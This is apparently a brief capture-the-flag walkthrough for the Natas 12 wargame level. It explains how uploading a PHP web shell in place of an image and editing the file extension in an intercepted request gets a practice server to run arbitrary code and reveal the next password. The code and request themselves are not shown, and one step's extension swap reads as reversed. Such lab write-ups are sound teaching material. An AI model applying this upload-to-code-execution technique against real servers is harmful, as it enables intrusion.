Natas 12 looks like the first chance we have to experiment with a new type of vulnerability, which relies on the fact that if we upload a PHP script instead of a JPG (and have the extension set to ".php"), the server will not just return our code to us, but it will actually run our code too!
If we take a super-simple PHP script that will execute whatever GET parameter we send it, we can now have the server execute arbitrary code for us:
When we intercept the file upload with BURP and see the POST request, it looks like this:
(You can see the file's be renamed as expected given the PHP code above)
If we manually replace the ".php" extension with ".jpg", we should be able to get the server to keep the new extension!
Ok, now that we've got the PHP script uploaded, we should be able to get it to print out the password for Natas 13 like this: